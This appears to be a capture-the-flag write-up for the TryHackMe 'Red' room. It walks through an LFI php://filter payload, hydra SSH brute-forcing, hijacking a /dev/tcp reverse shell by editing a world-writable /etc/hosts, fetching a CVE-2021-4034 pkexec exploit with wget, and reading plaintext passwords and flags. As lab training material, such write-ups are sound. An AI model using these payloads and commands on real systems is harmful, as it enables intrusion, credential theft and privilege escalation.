Red

https://tryhackme.com/room/redisl33t

Foothold

LFI payload

http://10.10.5.70/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

Decoded base64 of /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
blue:x:1000:1000:blue:/home/blue:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
red:x:1001:1001::/home/red:/bin/bash

obtained user notes

red
blue
root

obtained os version

Linux version 5.4.0-124-generic (buildd@lcy02-amd64-089) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #140-Ubuntu SMP Thu Aug 4 02:23:37 UTC 2022

Ubuntu 20.04.4 LTS \n \l

obtained /etc/hosts

127.0.0.1 localhost
127.0.1.1 red
192.168.0.1 redrules.thm

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouter

/home/blue/.bash_history

echo "Red rules"
cd
hashcat --stdout .reminder -r /usr/share/hashcat/rules/best64.rule > passlist.txt
cat passlist.txt
rm passlist.txt
sudo apt-get remove hashcat -y

attacker potentially took the password from hashcat generated

when you run this command, Hashcat will generate password candidates based on the rules defined in best64.rule and write those candidates to the passlist.txt file. These candidates can then be used for various purposes, including password cracking or security testing.

/home/blue/.reminder

sup3r_p@s$w0rd!

hydra

hydra -l blue -P passlist.txt ssh://10.10.5.70
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-13 16:12:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 77 login tries (l:1/p:77), ~5 tries per task
[DATA] attacking ssh://10.10.5.70:22/
[22][ssh] host: 10.10.5.70   login: blue   password: sup3r_p@s$w0!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-13 16:12:25

Note : Each time you login will have time limit before u get logged out again and new password will be used

bruteforce success

blue:sup3r_p@s$w0rd!123 

flag1

THM{Is_thAt_all_y0u_can_d0_blU3?}

checking the process ps -aux

red        16063  0.0  0.1   6972  2708 ?        S    08:18   0:00 bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &

found a reverse shell is being runned

Checking file permission on /etc/hosts

ls -l /etc/hosts
-rw-r--rw- 1 root adm 242 Sep 13 08:12 /etc/hosts

Found that it is writeable by anyone

Content of /etc/hosts

127.0.0.1 localhost
127.0.1.1 red
192.168.0.1 redrules.thm

Contains possibly the ip address of the attacker

Appending our ip into the domain name will get our ip a reverse shell

echo "10.8.17.213 redrules.thm" >> /etc/hosts
blue@red:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 red
192.168.0.1 redrules.thm

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouter
10.8.17.213 redrules.thm

flag2

THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S}

at red's home directory

la -laR
la -laR
.:
total 36
drwxr-xr-x 4 root red  4096 Aug 17  2022 .
drwxr-xr-x 4 root root 4096 Aug 14  2022 ..
lrwxrwxrwx 1 root root    9 Aug 14  2022 .bash_history -> /dev/null
-rw-r--r-- 1 red  red   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 red  red  3771 Feb 25  2020 .bashrc
drwx------ 2 red  red  4096 Aug 14  2022 .cache
-rw-r----- 1 root red    41 Aug 14  2022 flag2
drwxr-x--- 2 red  red  4096 Aug 14  2022 .git
-rw-r--r-- 1 red  red   807 Aug 14  2022 .profile
-rw-rw-r-- 1 red  red    75 Aug 14  2022 .selected_editor
-rw------- 1 red  red     0 Aug 17  2022 .viminfo

./.cache:
total 8
drwx------ 2 red  red 4096 Aug 14  2022 .
drwxr-xr-x 4 root red 4096 Aug 17  2022 ..
-rw-r--r-- 1 red  red    0 Aug 14  2022 motd.legal-displayed

./.git:
total 40
drwxr-x--- 2 red  red   4096 Aug 14  2022 .
drwxr-xr-x 4 root red   4096 Aug 17  2022 ..
-rwsr-xr-x 1 root root 31032 Aug 14  2022 pkexec

pkexec is found but need root

./pkexec /bin/sh
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/bin/sh' as the super user
Authenticating as: root
Password: root

Priv Esc

Version checking

./pkexec --help
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
red@red:~/.git$ ./pkexec --version

./pkexec --version
pkexec version 0.105

Reveals it an outdated version

Google for its exploit but gcc is not installed , found python cve and transfer it into the machine to get root access

Note : You also need to change the pkexec file path in the python file to /home/red/.git/pkexec

wget http://10.8.17.213:8000/CVE-2021-4034.py
--2023-09-13 08:43:07--  http://10.8.17.213:8000/CVE-2021-4034.py
Connecting to 10.8.17.213:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3268 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’

CVE-2021-4034.py    100%[===================>]   3.19K  --.-KB/s    in 0.001s  

2023-09-13 08:43:07 (3.64 MB/s) - ‘CVE-2021-4034.py’ saved [3268/3268]

python3 CVE-2021-4034.py

flag3

THM{Go0d_Gam3_Blu3_GG}

Post Exploitation

Content of /var/www/index.php

<?php 

function sanitize_input($param) {
    $param1 = str_replace("../","",$param);
    $param2 = str_replace("./","",$param1);
    return $param2;
}

$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
    $page = sanitize_input($page);
    readfile($page);
} else {
    header('Location: /index.php?page=home.html');
}

?>

The sanitize_input function will replace the "../" sequences with an empty string, leaving the input as php://filter/convert.base64-encode/resource=etc/passwd.

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

Script for random ssh password

cat change_pass.sh 
#!/bin/bash
n=$((1 + $RANDOM % 7))

if [ $n -eq 1 ]; then
        /usr/bin/echo 'blue:!dr0w$s@p_r3pus' | /usr/sbin/chpasswd

elif [ $n -eq 2 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0rd!123' | /usr/sbin/chpasswd

elif [ $n -eq 3 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0rd!9' | /usr/sbin/chpasswd

elif [ $n -eq 4 ]; then
        /usr/bin/echo 'blue:thesup3r_p@s$w0rd!' | /usr/sbin/chpasswd

elif [ $n -eq 5 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0sup3r_p@s$w0' | /usr/sbin/chpasswd

elif [ $n -eq 6 ]; then
        /usr/bin/echo 'blue:sup3r_p@s$w0!' | /usr/sbin/chpasswd

else
        /usr/bin/echo 'blue:sup3r_p@s$w0rd!23' | /usr/sbin/chpasswd

fi

Changes does not apply is because of this :

#!/bin/bash

for i in $(ps aux | grep tcp | grep 'redrules' | awk '{print $2}'); do kill -9 $i; done

this one-liner is searching for processes that contain "tcp" in their information and "redrules" in their command line arguments. It then forcefully terminates (kills) all such processes by their PIDs.

Reason our session/shell died

#!/bin/bash

for i in $(ps aux | grep blue | grep ' pts' | grep -v root | awk '{print $7}')
do
        /usr/bin/echo "Say Bye Bye to your Shell Blue and that password" > /dev/$i
        /usr/bin/killall -u blue
done

this script is meant to send a message to all non-root users with terminal sessions containing "blue" in their username and with a terminal type of 'pts'. It then attempts to kill all processes owned by the user "blue."